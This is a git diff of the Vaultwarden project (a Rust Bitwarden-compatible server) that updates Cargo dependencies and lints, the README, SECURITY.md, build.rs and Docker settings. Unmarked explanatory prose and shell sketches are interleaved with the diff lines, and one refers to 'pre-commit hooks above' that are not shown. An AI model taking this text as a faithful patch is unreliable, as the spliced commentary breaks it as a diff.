 authors = ["Daniel García <dani-garcia@users.noreply.github.com>"]
 edition = "2021"
-rust-version = "1.74.0"
+rust-version = "1.86.0"
 resolver = "2"
 
 repository = "https://github.com/dani-garcia/vaultwarden"
@@ -18,161 +21,183 @@ build = "build.rs"
 enable_syslog = []
 mysql = ["diesel/mysql", "diesel_migrations/mysql"]
 postgresql = ["diesel/postgres", "diesel_migrations/postgres"]
-sqlite = ["diesel/sqlite", "diesel_migrations/sqlite", "libsqlite3-sys"]
+sqlite = ["diesel/sqlite", "diesel_migrations/sqlite", "dep:libsqlite3-sys"]
 # Enable to use a vendored and statically linked openssl
 vendored_openssl = ["openssl/vendored"]
 # Enable MiMalloc memory allocator to replace the default malloc
 # This can improve performance for Alpine builds
-enable_mimalloc = ["mimalloc"]
+enable_mimalloc = ["dep:mimalloc"]
 # This is a development dependency, and should only be used during development!
 # It enables the usage of the diesel_logger crate, which is able to output the generated queries.
 # You also need to set an env variable `QUERY_LOGGER=1` to fully activate this so you do not have to re-compile
 # if you want to turn off the logging for a specific run.
-query_logger = ["diesel_logger"]
+query_logger = ["dep:diesel_logger"]
+s3 = ["opendal/services-s3", "dep:aws-config", "dep:aws-credential-types", "dep:aws-smithy-runtime-api", "dep:anyhow", "dep:http", "dep:reqsign"]
 
 # Enable unstable features, requires nightly
 # Currently only used to enable rusts official ip support
 unstable = []
 
-[target."cfg(not(windows))".dependencies]
+[target."cfg(unix)".dependencies]
 # Logging
-syslog = "6.1.0"
+syslog = "7.0.0"
 
 [dependencies]
+macros = { path = "./macros" }
+
 # Logging
-log = "0.4.20"
+log = "0.4.27"
-fern = { version = "0.6.2", features = ["syslog-6", "reopen-1"] }
+fern = { version = "0.7.1", features = ["syslog-7", "reopen-1"] }
-tracing = { version = "0.1.40", features = ["log"] } # Needed to have lettre and webauthn-rs trace logging to work
+tracing = { version = "0.1.41", features = ["log"] } # Needed to have lettre and webauthn-rs trace logging to work
 
 # A `dotenv` implementation for Rust
 dotenvy = { version = "0.15.7", default-features = false }
 
 # Lazy initialization
-once_cell = "1.19.0"
+once_cell = "1.21.3"
 
 # Numerical libraries
-num-traits = "0.2.18"
+num-traits = "0.2.19"
 num-derive = "0.4.2"
-bigdecimal = "0.4.2"
+bigdecimal = "0.4.8"
 
 # Web framework
-rocket = { version = "0.5.0", features = ["tls", "json"], default-features = false }
+rocket = { version = "0.5.1", features = ["tls", "json"], default-features = false }
-rocket_ws = { version ="0.1.0" }
+rocket_ws = { version ="0.1.1" }
 
 # WebSockets libraries
-tokio-tungstenite = "0.20.1"
-rmpv = "1.0.1" # MessagePack library
+rmpv = "1.3.0" # MessagePack library
 
 # Concurrent HashMap used for WebSocket messaging and favicons
-dashmap = "5.5.3"
+dashmap = "6.1.0"
 
 # Async futures
-futures = "0.3.30"
+futures = "0.3.31"
-tokio = { version = "1.36.0", features = ["rt-multi-thread", "fs", "io-util", "parking_lot", "time", "signal"] }
+tokio = { version = "1.46.1", features = ["rt-multi-thread", "fs", "io-util", "parking_lot", "time", "signal", "net"] }
+tokio-util = { version = "0.7.15", features = ["compat"]}
 
 # A generic serialization/deserialization framework
-serde = { version = "1.0.197", features = ["derive"] }
+serde = { version = "1.0.219", features = ["derive"] }
-serde_json = "1.0.114"
+serde_json = "1.0.140"
 
 # A safe, extensible ORM and Query builder
-diesel = { version = "2.1.4", features = ["chrono", "r2d2", "numeric"] }
+diesel = { version = "2.2.12", features = ["chrono", "r2d2", "numeric"] }
-diesel_migrations = "2.1.0"
+diesel_migrations = "2.2.0"
-diesel_logger = { version = "0.3.0", optional = true }
+diesel_logger = { version = "0.4.0", optional = true }
+
+derive_more = { version = "2.0.1", features = ["from", "into", "as_ref", "deref", "display"] }
+diesel-derive-newtype = "2.1.2"
 
 # Bundled/Static SQLite
-libsqlite3-sys = { version = "0.27.0", features = ["bundled"], optional = true }
+libsqlite3-sys = { version = "0.35.0", features = ["bundled"], optional = true }
 
 # Crypto-related libraries
-rand = { version = "0.8.5", features = ["small_rng"] }
+rand = "0.9.1"
-ring = "0.17.8"
+ring = "0.17.14"
+subtle = "2.6.1"
 
 # UUID generation
-uuid = { version = "1.7.0", features = ["v4"] }
+uuid = { version = "1.17.0", features = ["v4"] }
 
 # Date and time libraries
-chrono = { version = "0.4.34", features = ["clock", "serde"], default-features = false }
+chrono = { version = "0.4.41", features = ["clock", "serde"], default-features = false }
-chrono-tz = "0.8.6"
+chrono-tz = "0.10.4"
-time = "0.3.34"
+time = "0.3.41"
 
 # Job scheduler
-job_scheduler_ng = "2.0.4"
+job_scheduler_ng = "2.2.0"
 
 # Data encoding library Hex/Base32/Base64
-data-encoding = "2.5.0"
+data-encoding = "2.9.0"
 
 # JWT library
-jsonwebtoken = "9.2.0"
+jsonwebtoken = "9.3.1"
 
 # TOTP library
 totp-lite = "2.0.1"
 
 # Yubico Library
-yubico = { version = "0.11.0", features = ["online-tokio"], default-features = false }
+yubico = { package = "yubico_ng", version = "0.13.0", features = ["online-tokio"], default-features = false }
 
 # WebAuthn libraries
 webauthn-rs = "0.3.2"
 
 # Handling of URL's for WebAuthn and favicons
-url = "2.5.0"
+url = "2.5.4"
 
 # Email libraries
-lettre = { version = "0.11.4", features = ["smtp-transport", "sendmail-transport", "builder", "serde", "tokio1-native-tls", "hostname", "tracing", "tokio1"], default-features = false }
+lettre = { version = "0.11.17", features = ["smtp-transport", "sendmail-transport", "builder", "serde", "hostname", "tracing", "tokio1-rustls", "ring", "rustls-native-certs"], default-features = false }
 percent-encoding = "2.3.1" # URL encoding library used for URL's in the emails
-email_address = "0.2.4"
+email_address = "0.2.9"
 
 # HTML Template library
-handlebars = { version = "5.1.0", features = ["dir_source"] }
+handlebars = { version = "6.3.2", features = ["dir_source"] }
 
 # HTTP client (Used for favicons, version check, DUO and HIBP API)
-reqwest = { version = "0.11.24", features = ["stream", "json", "gzip", "brotli", "socks", "cookies", "trust-dns", "native-tls-alpn"] }
+reqwest = { version = "0.12.22", features = ["rustls-tls", "rustls-tls-native-roots", "stream", "json", "deflate", "gzip", "brotli", "zstd", "socks", "cookies", "charset", "http2", "system-proxy"], default-features = false}
+hickory-resolver = "0.25.2"
 
 # Favicon extraction libraries
-html5gum = "0.5.7"
+html5gum = "0.7.0"
-regex = { version = "1.10.3", features = ["std", "perf", "unicode-perl"], default-features = false }
+regex = { version = "1.11.1", features = ["std", "perf", "unicode-perl"], default-features = false }
 data-url = "0.3.1"
-bytes = "1.5.0"
+bytes = "1.10.1"
+svg-hush = "0.9.5"
 
 # Cache function results (Used for version check and favicon fetching)
-cached = { version = "0.48.1", features = ["async"] }
+cached = { version = "0.55.1", features = ["async"] }
 
 # Used for custom short lived cookie jar during favicon extraction
-cookie = "0.17.0"
+cookie = "0.18.1"
-cookie_store = "0.20.0"
+cookie_store = "0.21.1"
 
 # Used by U2F, JWT and PostgreSQL
-openssl = "0.10.64"
+openssl = "0.10.73"
 
 # CLI argument parsing
 pico-args = "0.5.0"
 
 # Macro ident concatenation
-paste = "1.0.14"
+pastey = "0.1.0"
-governor = "0.6.3"
+governor = "0.10.0"
 
 # Check client versions for specific features.
-semver = "1.0.22"
+semver = "1.0.26"
 
 # Allow overriding the default memory allocator
 # Mainly used for the musl builds, since the default musl malloc is very slow
-mimalloc = { version = "0.1.39", features = ["secure"], default-features = false, optional = true }
-which = "6.0.0"
+mimalloc = { version = "0.1.47", features = ["secure"], default-features = false, optional = true }
+
+which = "8.0.0"
 
 # Argon2 library with support for the PHC format
 argon2 = "0.5.3"
 
 # Reading a password from the cli for generating the Argon2id ADMIN_TOKEN
-rpassword = "7.3.1"
+rpassword = "7.4.0"
+
+# Loading a dynamic CSS Stylesheet
+grass_compiler = { version = "0.13.4", default-features = false }
+
+# File are accessed through Apache OpenDAL
+opendal = { version = "0.53.3", features = ["services-fs"], default-features = false }
+
+# For retrieving AWS credentials, including temporary SSO credentials
+anyhow = { version = "1.0.98", optional = true }
+aws-config = { version = "1.8.1", features = ["behavior-version-latest", "rt-tokio", "credentials-process", "sso"], default-features = false, optional = true }
+aws-credential-types = { version = "1.2.3", optional = true }
+aws-smithy-runtime-api = { version = "1.8.3", optional = true }
+http = { version = "1.3.1", optional = true }
+reqsign = { version = "0.16.5", optional = true }
 
 # Strip debuginfo from the release builds
-# The symbols are the provide better panic traces
+# The debug symbols are to provide better panic traces
 # Also enable fat LTO and use 1 codegen unit for optimizations
 [profile.release]
 strip = "debuginfo"
 lto = "fat"
 codegen-units = 1
 
 
 # A little bit of a speedup
 [profile.dev]
 split-debuginfo = "unpacked"
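The `dep:` prefix marks crates like `mimalloc` and `diesel_logger` as purely internal optional dependencies instead of also exposing them as implicit feature names. Enabling the new `s3` feature at build time would look like this (a sketch; the feature combination is illustrative):

```bash
# Build with the SQLite backend plus the new S3 storage feature; the
# optional AWS crates are pulled in through the feature's `dep:` entries.
cargo build --release --features sqlite,s3
```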
@@ -200,34 +225,51 @@ lto = "thin"
 codegen-units = 16
 
 # Linting config
-[lints.rust]
+# https://doc.rust-lang.org/rustc/lints/groups.html
+[workspace.lints.rust]
 # Forbid
 unsafe_code = "forbid"
 non_ascii_idents = "forbid"
 
 # Deny
-future_incompatible = "deny"
+deprecated_in_future = "deny"
+future_incompatible = { level = "deny", priority = -1 }
+keyword_idents = { level = "deny", priority = -1 }
+let_underscore = { level = "deny", priority = -1 }
 noop_method_call = "deny"
-pointer_structural_match = "deny"
+refining_impl_trait = { level = "deny", priority = -1 }
-rust_2018_idioms = "deny"
+rust_2018_idioms = { level = "deny", priority = -1 }
-rust_2021_compatibility = "deny"
+rust_2021_compatibility = { level = "deny", priority = -1 }
+rust_2024_compatibility = { level = "deny", priority = -1 }
+edition_2024_expr_fragment_specifier = "allow" # Once changed to Rust 2024 this should be removed and macro's should be validated again
+single_use_lifetimes = "deny"
 trivial_casts = "deny"
 trivial_numeric_casts = "deny"
-unused = "deny"
+unused = { level = "deny", priority = -1 }
 unused_import_braces = "deny"
 unused_lifetimes = "deny"
-deprecated_in_future = "deny"
+unused_qualifications = "deny"
+variant_size_differences = "deny"
+# Allow the following lints since these cause issues with Rust v1.84.0 or newer
+# Building Vaultwarden with Rust v1.85.0 and edition 2024 also works without issues
+if_let_rescope = "allow"
+tail_expr_drop_order = "allow"
 
-[lints.clippy]
-# Allow
-# We need this since Rust v1.76+, since it has some bugs
-# https://github.com/rust-lang/rust-clippy/issues/12016
-blocks_in_conditions = "allow"
+# https://rust-lang.github.io/rust-clippy/stable/index.html
+[workspace.lints.clippy]
+# Warn
+dbg_macro = "warn"
+todo = "warn"
+
+# Ignore/Allow
+result_large_err = "allow"
 
 # Deny
+case_sensitive_file_extension_comparisons = "deny"
 cast_lossless = "deny"
 clone_on_ref_ptr = "deny"
 equatable_if_let = "deny"
+filter_map_next = "deny"
 float_cmp_const = "deny"
 inefficient_to_string = "deny"
 iter_on_empty_collections = "deny"
@@ -239,11 +281,18 @@ manual_instant_elapsed = "deny"
 manual_string_new = "deny"
 match_wildcard_for_single_variants = "deny"
 mem_forget = "deny"
+needless_continue = "deny"
 needless_lifetimes = "deny"
+option_option = "deny"
 string_add_assign = "deny"
 string_to_string = "deny"
 unnecessary_join = "deny"
 unnecessary_self_imports = "deny"
+unnested_or_patterns = "deny"
 unused_async = "deny"
+unused_self = "deny"
 verbose_file_reads = "deny"
 zero_sized_map_values = "deny"
+
+[lints]
+workspace = true
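With the `[lints] workspace = true` stanza, the root crate and the `macros` member both inherit the same `[workspace.lints.*]` tables, so a plain clippy invocation picks the levels up automatically (a sketch matching the feature set used by the pre-commit hooks above):

```bash
# Workspace lint levels (forbid/deny/warn/allow) apply without extra flags;
# -D warnings additionally turns any remaining warnings into errors.
cargo clippy --features sqlite,mysql,postgresql,enable_mimalloc -- -D warnings
```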
README.md: 204 lines changed
@@ -1,102 +1,146 @@
-### Alternative implementation of the Bitwarden server API written in Rust and compatible with [upstream Bitwarden clients](https://bitwarden.com/download/)*, perfect for self-hosted deployment where running the official resource-heavy service might not be ideal.
-
-📢 Note: This project was known as Bitwarden_RS and has been renamed to separate itself from the official Bitwarden server in the hopes of avoiding confusion and trademark/branding issues. Please see [#1642](https://github.com/dani-garcia/vaultwarden/discussions/1642) for more explanation.
+
+An alternative server implementation of the Bitwarden Client API, written in Rust and compatible with [official Bitwarden clients](https://bitwarden.com/download/) [[disclaimer](#disclaimer)], perfect for self-hosted deployment where running the official resource-heavy service might not be ideal.
 
 ---
-[](https://github.com/dani-garcia/vaultwarden/actions/workflows/build.yml)
-[](https://github.com/dani-garcia/vaultwarden/pkgs/container/vaultwarden)
-[](https://hub.docker.com/r/vaultwarden/server)
-[](https://quay.io/repository/vaultwarden/server)
-[](https://deps.rs/repo/github/dani-garcia/vaultwarden)
-[](https://github.com/dani-garcia/vaultwarden/releases/latest)
-[](https://github.com/dani-garcia/vaultwarden/blob/main/LICENSE.txt)
-[](https://matrix.to/#/#vaultwarden:matrix.org)
-
-Image is based on [Rust implementation of Bitwarden API](https://github.com/dani-garcia/vaultwarden).
+[](https://github.com/dani-garcia/vaultwarden/releases/latest)
+[](https://github.com/dani-garcia/vaultwarden/pkgs/container/vaultwarden)
+[](https://hub.docker.com/r/vaultwarden/server)
+[](https://quay.io/repository/vaultwarden/server) <br>
+[](https://github.com/dani-garcia/vaultwarden/graphs/contributors)
+[](https://github.com/dani-garcia/vaultwarden/network/members)
+[](https://github.com/dani-garcia/vaultwarden/stargazers)
+[](https://github.com/dani-garcia/vaultwarden/issues)
+[](https://github.com/dani-garcia/vaultwarden/issues?q=is%3Aissue+is%3Aclosed)
+[](https://github.com/dani-garcia/vaultwarden/blob/main/LICENSE.txt) <br>
+[](https://deps.rs/repo/github/dani-garcia/vaultwarden)
+[](https://github.com/dani-garcia/vaultwarden/actions/workflows/release.yml)
+[](https://github.com/dani-garcia/vaultwarden/actions/workflows/build.yml) <br>
+[](https://matrix.to/#/#vaultwarden:matrix.org)
+[](https://github.com/dani-garcia/vaultwarden/discussions)
+[](https://vaultwarden.discourse.group/)
 
-**This project is not associated with the [Bitwarden](https://bitwarden.com/) project nor Bitwarden, Inc.**
+> [!IMPORTANT]
+> **When using this server, please report any bugs or suggestions directly to us (see [Get in touch](#get-in-touch)), regardless of whatever clients you are using (mobile, desktop, browser...). DO NOT use the official Bitwarden support channels.**
 
-#### ⚠️**IMPORTANT**⚠️: When using this server, please report any bugs or suggestions to us directly (look at the bottom of this page for ways to get in touch), regardless of whatever clients you are using (mobile, desktop, browser...). DO NOT use the official support channels.
-
----
+<br>
 
 ## Features
 
-Basically full implementation of Bitwarden API is provided including:
+A nearly complete implementation of the Bitwarden Client API is provided, including:
 
-* Organizations support
-* Attachments and Send
-* Vault API support
-* Serving the static files for Vault interface
-* Website icons API
-* Authenticator and U2F support
-* YubiKey and Duo support
-* Emergency Access
+* [Personal Vault](https://bitwarden.com/help/managing-items/)
+* [Send](https://bitwarden.com/help/about-send/)
+* [Attachments](https://bitwarden.com/help/attachments/)
+* [Website icons](https://bitwarden.com/help/website-icons/)
+* [Personal API Key](https://bitwarden.com/help/personal-api-key/)
+* [Organizations](https://bitwarden.com/help/getting-started-organizations/)
+  - [Collections](https://bitwarden.com/help/about-collections/),
+    [Password Sharing](https://bitwarden.com/help/sharing/),
+    [Member Roles](https://bitwarden.com/help/user-types-access-control/),
+    [Groups](https://bitwarden.com/help/about-groups/),
+    [Event Logs](https://bitwarden.com/help/event-logs/),
+    [Admin Password Reset](https://bitwarden.com/help/admin-reset/),
+    [Directory Connector](https://bitwarden.com/help/directory-sync/),
+    [Policies](https://bitwarden.com/help/policies/)
+* [Multi/Two Factor Authentication](https://bitwarden.com/help/bitwarden-field-guide-two-step-login/)
+  - [Authenticator](https://bitwarden.com/help/setup-two-step-login-authenticator/),
+    [Email](https://bitwarden.com/help/setup-two-step-login-email/),
+    [FIDO2 WebAuthn](https://bitwarden.com/help/setup-two-step-login-fido/),
+    [YubiKey](https://bitwarden.com/help/setup-two-step-login-yubikey/),
+    [Duo](https://bitwarden.com/help/setup-two-step-login-duo/)
+* [Emergency Access](https://bitwarden.com/help/emergency-access/)
+* [Vaultwarden Admin Backend](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-admin-page)
+* [Modified Web Vault client](https://github.com/dani-garcia/bw_web_builds) (Bundled within our containers)
 
-## Installation
-Pull the docker image and mount a volume from the host for persistent storage:
-
-```sh
-docker pull vaultwarden/server:latest
-docker run -d --name vaultwarden -v /vw-data/:/data/ --restart unless-stopped -p 80:80 vaultwarden/server:latest
-```
-This will preserve any persistent data under /vw-data/, you can adapt the path to whatever suits you.
-
-**IMPORTANT**: Most modern web browsers disallow the use of Web Crypto APIs in insecure contexts. In this case, you might get an error like `Cannot read property 'importKey'`. To solve this problem, you need to access the web vault via HTTPS or localhost.
-
-This can be configured in [vaultwarden directly](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-HTTPS) or using a third-party reverse proxy ([some examples](https://github.com/dani-garcia/vaultwarden/wiki/Proxy-examples)).
-
-If you have an available domain name, you can get HTTPS certificates with [Let's Encrypt](https://letsencrypt.org/), or you can generate self-signed certificates with utilities like [mkcert](https://github.com/FiloSottile/mkcert). Some proxies automatically do this step, like Caddy (see examples linked above).
+<br>
 
 ## Usage
-See the [vaultwarden wiki](https://github.com/dani-garcia/vaultwarden/wiki) for more information on how to configure and run the vaultwarden server.
+
+> [!IMPORTANT]
+> The web-vault requires the use a secure context for the [Web Crypto API](https://developer.mozilla.org/en-US/docs/Web/API/Web_Crypto_API).
+> That means it will only work via `http://localhost:8000` (using the port from the example below) or if you [enable HTTPS](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-HTTPS).
+
+The recommended way to install and use Vaultwarden is via our container images which are published to [ghcr.io](https://github.com/dani-garcia/vaultwarden/pkgs/container/vaultwarden), [docker.io](https://hub.docker.com/r/vaultwarden/server) and [quay.io](https://quay.io/repository/vaultwarden/server).
+See [which container image to use](https://github.com/dani-garcia/vaultwarden/wiki/Which-container-image-to-use) for an explanation of the provided tags.
+
+There are also [community driven packages](https://github.com/dani-garcia/vaultwarden/wiki/Third-party-packages) which can be used, but those might be lagging behind the latest version or might deviate in the way Vaultwarden is configured, as described in our [Wiki](https://github.com/dani-garcia/vaultwarden/wiki).
+
+Alternatively, you can also [build Vaultwarden](https://github.com/dani-garcia/vaultwarden/wiki/Building-binary) yourself.
+
+While Vaultwarden is based upon the [Rocket web framework](https://rocket.rs) which has built-in support for TLS our recommendation would be that you setup a reverse proxy (see [proxy examples](https://github.com/dani-garcia/vaultwarden/wiki/Proxy-examples)).
+
+> [!TIP]
+>**For more detailed examples on how to install, use and configure Vaultwarden you can check our [Wiki](https://github.com/dani-garcia/vaultwarden/wiki).**
+
+### Docker/Podman CLI
+
+Pull the container image and mount a volume from the host for persistent storage.<br>
+You can replace `docker` with `podman` if you prefer to use podman.
+
+```shell
+docker pull vaultwarden/server:latest
+docker run --detach --name vaultwarden \
+  --env DOMAIN="https://vw.domain.tld" \
+  --volume /vw-data/:/data/ \
+  --restart unless-stopped \
+  --publish 127.0.0.1:8000:80 \
+  vaultwarden/server:latest
+```
+
+This will preserve any persistent data under `/vw-data/`, you can adapt the path to whatever suits you.
+
+### Docker Compose
+
+To use Docker compose you need to create a `compose.yaml` which will hold the configuration to run the Vaultwarden container.
+
+```yaml
+services:
+  vaultwarden:
+    image: vaultwarden/server:latest
+    container_name: vaultwarden
+    restart: unless-stopped
+    environment:
+      DOMAIN: "https://vw.domain.tld"
+    volumes:
+      - ./vw-data/:/data/
+    ports:
+      - 127.0.0.1:8000:80
+```
+
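Once the container is up, a quick reachability check can be done against Vaultwarden's liveness endpoint (a sketch; assumes the `127.0.0.1:8000:80` port mapping from the examples above):

```bash
# /alive returns HTTP 200 with the current server time when the server is up.
curl -s http://localhost:8000/alive
```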
|
<br>
|
||||||
|
|
||||||
## Get in touch
|
## Get in touch
|
||||||
To ask a question, offer suggestions or new features or to get help configuring or installing the software, please use [GitHub Discussions](https://github.com/dani-garcia/vaultwarden/discussions) or [the forum](https://vaultwarden.discourse.group/).
|
|
||||||
|
|
||||||
If you spot any bugs or crashes with vaultwarden itself, please [create an issue](https://github.com/dani-garcia/vaultwarden/issues/). Make sure you are on the latest version and there aren't any similar issues open, though!
|
Have a question, suggestion or need help? Join our community on [Matrix](https://matrix.to/#/#vaultwarden:matrix.org), [GitHub Discussions](https://github.com/dani-garcia/vaultwarden/discussions) or [Discourse Forums](https://vaultwarden.discourse.group/).
|
||||||
|
|
||||||
If you prefer to chat, we're usually hanging around at [#vaultwarden:matrix.org](https://matrix.to/#/#vaultwarden:matrix.org) room on Matrix. Feel free to join us!
|
Encountered a bug or crash? Please search our issue tracker and discussions to see if it's already been reported. If not, please [start a new discussion](https://github.com/dani-garcia/vaultwarden/discussions) or [create a new issue](https://github.com/dani-garcia/vaultwarden/issues/). Ensure you're using the latest version of Vaultwarden and there aren't any similar issues open or closed!
|
||||||
|
|
||||||
|
<br>
|
||||||
|
|
||||||
|
## Contributors
|
||||||
|
|
||||||
### Sponsors
|
|
||||||
Thanks for your contribution to the project!
|
Thanks for your contribution to the project!
|
||||||
|
|
||||||
<!--
[![Contributors](https://contrib.rocks/image?repo=dani-garcia/vaultwarden)](https://github.com/dani-garcia/vaultwarden/graphs/contributors)
<table>
 <tr>
  <td align="center">
   <a href="https://github.com/username">
    <img src="https://avatars.githubusercontent.com/u/725423?s=75&v=4" width="75px;" alt="username"/>
    <br />
    <sub><b>username</b></sub>
   </a>
  </td>
 </tr>
</table>
<br>
-->

<table>
 <tr>
  <td align="center">
   <a href="https://github.com/themightychris" style="width: 75px">
    <sub><b>Chris Alfano</b></sub>
   </a>
  </td>
 </tr>
 <tr>
  <td align="center">
   <a href="https://github.com/numberly" style="width: 75px">
    <sub><b>Numberly</b></sub>
   </a>
  </td>
 </tr>
 <tr>
  <td align="center">
   <a href="https://github.com/IQ333777" style="width: 75px">
    <sub><b>IQ333777</b></sub>
   </a>
  </td>
 </tr>
</table>

<br>

## Disclaimer
**This project is not associated with [Bitwarden](https://bitwarden.com/) or Bitwarden, Inc.**

However, one of the active maintainers for Vaultwarden is employed by Bitwarden and is allowed to contribute to the project on their own time. These contributions are independent of Bitwarden and are reviewed by other maintainers.

The maintainers work together to set the direction for the project, focusing on serving the self-hosting community, including individuals, families, and small organizations, while ensuring the project's sustainability.

**Please note:** We cannot be held liable for any data loss that may occur while using Vaultwarden. This includes passwords, attachments, and other information handled by the application. We highly recommend performing regular backups of your files and database. However, should you experience data loss, we encourage you to contact us immediately.
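
The backups recommended above can be as small as the following sketch, assuming the default SQLite backend and the `/vw-data/` volume from the earlier examples (the paths are placeholders; see the Wiki for complete guidance):

```shell
# Snapshot the database safely while Vaultwarden is running,
# then archive the rest of the data folder (attachments, keys, icon cache).
sqlite3 /vw-data/db.sqlite3 ".backup '/backups/db-$(date +%F).sqlite3'"
tar -czf "/backups/vw-data-$(date +%F).tar.gz" --exclude='db.sqlite3*' /vw-data/
```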

## Bitwarden_RS
This project was known as Bitwarden_RS and has been renamed to separate itself from the official Bitwarden server in the hopes of avoiding confusion and trademark/branding issues.<br>
Please see [#1642 - v1.21.0 release and project rename to Vaultwarden](https://github.com/dani-garcia/vaultwarden/discussions/1642) for more explanation.

SECURITY.md
@@ -21,7 +21,7 @@ notify us. We welcome working with you to resolve the issue promptly. Thanks in
 The following bug classes are out-of scope:

 - Bugs that are already reported on Vaultwarden's issue tracker (https://github.com/dani-garcia/vaultwarden/issues)
-- Bugs that are not part of Vaultwarden, like on the the web-vault or mobile and desktop clients. These issues need to be reported in the respective project issue tracker at https://github.com/bitwarden to which we are not associated
+- Bugs that are not part of Vaultwarden, like on the web-vault or mobile and desktop clients. These issues need to be reported in the respective project issue tracker at https://github.com/bitwarden to which we are not associated
 - Issues in an upstream software dependency (ex: Rust, or External Libraries) which are already reported to the upstream maintainer
 - Attacks requiring physical access to a user's device
 - Issues related to software or protocols not under Vaultwarden's control
@@ -39,7 +39,11 @@ Thank you for helping keep Vaultwarden and our users safe!

 # How to contact us

-- You can contact us on Matrix https://matrix.to/#/#vaultwarden:matrix.org (user: `@danig:matrix.org`)
-- You can send an [email](mailto:security@vaultwarden.org) to report a security issue.
-- If you want to send an encrypted email you can use the following GPG key:<br>
-  https://keyserver.ubuntu.com/pks/lookup?search=0xB9B7A108373276BF3C0406F9FC8A7D14C3CD543A&fingerprint=on&op=index
+- You can contact us on Matrix https://matrix.to/#/#vaultwarden:matrix.org (users: `@danig:matrix.org` and/or `@blackdex:matrix.org`)
+- You can send an [email](mailto:security@vaultwarden.org) to report a security issue.<br>
+  If you want to send an encrypted email you can use the following GPG key: 13BB3A34C9E380258CE43D595CB150B31F6426BC<br>
+  It can be found on several public GPG key servers.<br>
+  * https://keys.openpgp.org/search?q=security%40vaultwarden.org
+  * https://keys.mailvelope.com/pks/lookup?op=get&search=security%40vaultwarden.org
+  * https://pgpkeys.eu/pks/lookup?search=security%40vaultwarden.org&fingerprint=on&op=index
+  * https://keyserver.ubuntu.com/pks/lookup?search=security%40vaultwarden.org&fingerprint=on&op=index
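
For reference, one way to import and check that key could be the sketch below; any of the keyservers listed above should work, `keys.openpgp.org` is just the example here:

```shell
gpg --keyserver hkps://keys.openpgp.org --recv-keys 13BB3A34C9E380258CE43D595CB150B31F6426BC
gpg --fingerprint security@vaultwarden.org
```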

build.rs
@@ -11,12 +11,22 @@ fn main() {
     println!("cargo:rustc-cfg=postgresql");
     #[cfg(feature = "query_logger")]
     println!("cargo:rustc-cfg=query_logger");
+    #[cfg(feature = "s3")]
+    println!("cargo:rustc-cfg=s3");

     #[cfg(not(any(feature = "sqlite", feature = "mysql", feature = "postgresql")))]
     compile_error!(
         "You need to enable one DB backend. To build with previous defaults do: cargo build --features sqlite"
     );

+    // Use check-cfg to let cargo know which cfg's we define,
+    // and avoid warnings when they are used in the code.
+    println!("cargo::rustc-check-cfg=cfg(sqlite)");
+    println!("cargo::rustc-check-cfg=cfg(mysql)");
+    println!("cargo::rustc-check-cfg=cfg(postgresql)");
+    println!("cargo::rustc-check-cfg=cfg(query_logger)");
+    println!("cargo::rustc-check-cfg=cfg(s3)");
+
     // Rerun when these paths are changed.
     // Someone could have checked-out a tag or specific commit, but no other files changed.
     println!("cargo:rerun-if-changed=.git");
@@ -41,8 +51,8 @@ fn main() {
 fn run(args: &[&str]) -> Result<String, std::io::Error> {
     let out = Command::new(args[0]).args(&args[1..]).output()?;
     if !out.status.success() {
-        use std::io::{Error, ErrorKind};
-        return Err(Error::new(ErrorKind::Other, "Command not successful"));
+        use std::io::Error;
+        return Err(Error::other("Command not successful"));
     }
     Ok(String::from_utf8(out.stdout).unwrap().trim().to_string())
 }
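
Because of the `compile_error!` guard above, at least one database feature has to be enabled when building outside the provided containers, for example:

```shell
cargo build --release --features sqlite
# backends can be combined; the new s3 support stays behind its own feature
cargo build --release --features sqlite,mysql,postgresql
```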

DockerSettings.yaml
@@ -1,12 +1,13 @@
 ---
-vault_version: "v2024.1.2b"
-vault_image_digest: "sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08"
-# Cross Compile Docker Helper Scripts v1.3.0
+vault_version: "v2025.7.0"
+vault_image_digest: "sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e"
+# Cross Compile Docker Helper Scripts v1.6.1
 # We use the linux/amd64 platform shell scripts since there is no difference between the different platform scripts
-xx_image_digest: "sha256:c9609ace652bbe51dd4ce90e0af9d48a4590f1214246da5bc70e46f6dd586edc"
-rust_version: 1.76.0 # Rust version to be used
+# https://github.com/tonistiigi/xx | https://hub.docker.com/r/tonistiigi/xx/tags
+xx_image_digest: "sha256:9c207bead753dda9430bdd15425c6518fc7a03d866103c516a2c6889188f5894"
+rust_version: 1.88.0 # Rust version to be used
 debian_version: bookworm # Debian release name to be used
-alpine_version: 3.19 # Alpine version to be used
+alpine_version: "3.22" # Alpine version to be used
 # For which platforms/architectures will we try to build images
 platforms: ["linux/amd64", "linux/arm64", "linux/arm/v7", "linux/arm/v6"]
 # Determine the build images per OS/Arch

docker/Dockerfile.alpine
@@ -1,4 +1,5 @@
 # syntax=docker/dockerfile:1
+# check=skip=FromPlatformFlagConstDisallowed,RedundantTargetPlatform

 # This file was generated using a Jinja2 template.
 # Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
@@ -18,27 +19,27 @@
 # - From https://hub.docker.com/r/vaultwarden/web-vault/tags,
 #   click the tag name to view the digest of the image it currently points to.
 # - From the command line:
-#     $ docker pull docker.io/vaultwarden/web-vault:v2024.1.2b
-#     $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2024.1.2b
-#     [docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08]
+#     $ docker pull docker.io/vaultwarden/web-vault:v2025.7.0
+#     $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2025.7.0
+#     [docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e]
 #
 # - Conversely, to get the tag name from the digest:
-#     $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08
-#     [docker.io/vaultwarden/web-vault:v2024.1.2b]
+#     $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e
+#     [docker.io/vaultwarden/web-vault:v2025.7.0]
 #
